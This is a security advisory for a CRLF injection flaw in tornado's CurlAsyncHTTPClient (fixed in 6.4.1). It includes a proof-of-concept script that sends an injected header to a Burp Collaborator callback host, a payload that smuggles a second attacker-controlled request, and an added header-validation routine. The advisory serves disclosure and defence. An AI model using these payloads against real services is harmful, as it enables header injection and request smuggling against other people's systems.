Upgrade tornado to version 6.4.1 or higher.
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') through header values passed to CurlAsyncHTTPClient, which are sent to the server without being checked for CR/LF characters. An attacker who controls a header value can therefore add arbitrary headers or construct entirely new, unauthorized requests by injecting CRLF sequences into it.
The issue can be reproduced using the following script:
import asyncio
from tornado import httpclient
from tornado import curl_httpclient


async def main():
    http_client = curl_httpclient.CurlAsyncHTTPClient()
    request = httpclient.HTTPRequest(
        # Burp Collaborator payload
        "http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/",
        method="POST",
        body="body",
        # Injected header using CRLF characters
        headers={"Foo": "Bar\r\nHeader: Injected"},
    )
    response = await http_client.fetch(request)
    print(response.body)
    http_client.close()


if __name__ == "__main__":
    asyncio.run(main())
When the specified server receives the request, it contains the injected header (Header: Injected) on its own line:
POST / HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
Foo: Bar
Header: Injected
Content-Length: 4
Content-Type: application/x-www-form-urlencoded

body
The attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of \r\n\r\nPOST /attacker-controlled-url HTTP/1.1\r\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com results in the server receiving an additional, attacker-controlled request:
POST /attacker-controlled-url HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
Content-Length: 4
Content-Type: application/x-www-form-urlencoded

body
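As an added example (not part of this advisory and not tornado's own code), the kind of input validation an application can apply to header names and values built from untrusted data before handing them to CurlAsyncHTTPClient. The token and control-character rules are my assumptions taken from the HTTP field syntax; upgrading to 6.4.1 remains the actual fix, this check only guards the application's own inputs.

```python
import re

# Assumptions (added example, not tornado code): header names must match the
# HTTP token syntax, and header values may contain any printable character
# plus SP and HTAB, but never CR, LF or other control characters.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_CTL = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")  # control chars incl. CR and LF


class HeaderInjectionError(ValueError):
    """Raised when a header entry could split the outgoing HTTP message."""


def validate_headers(headers):
    """Return a str->str copy of `headers`, or raise HeaderInjectionError if
    any name or value could smuggle an extra header line or a whole request."""
    clean = {}
    for name, value in headers.items():
        name, value = str(name), str(value)
        if not _TOKEN.match(name):
            raise HeaderInjectionError(f"invalid header name: {name!r}")
        if _CTL.search(value):
            raise HeaderInjectionError(f"control character in value of {name!r}")
        clean[name] = value
    return clean


def is_injection_attempt(headers):
    """True if validate_headers rejects `headers`; handy for logging/alerting."""
    try:
        validate_headers(headers)
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    # Constructed samples: a benign header and the advisory's two payload shapes.
    samples = [
        {"Foo": "Bar"},
        {"Foo": "Bar\r\nHeader: Injected"},
        {"Foo": "\r\n\r\nPOST /attacker-controlled-url HTTP/1.1\r\nHost: example.invalid"},
    ]
    for sample in samples:
        verdict = "REJECTED" if is_injection_attempt(sample) else "ok"
        print(f"{verdict}: {sample}")
```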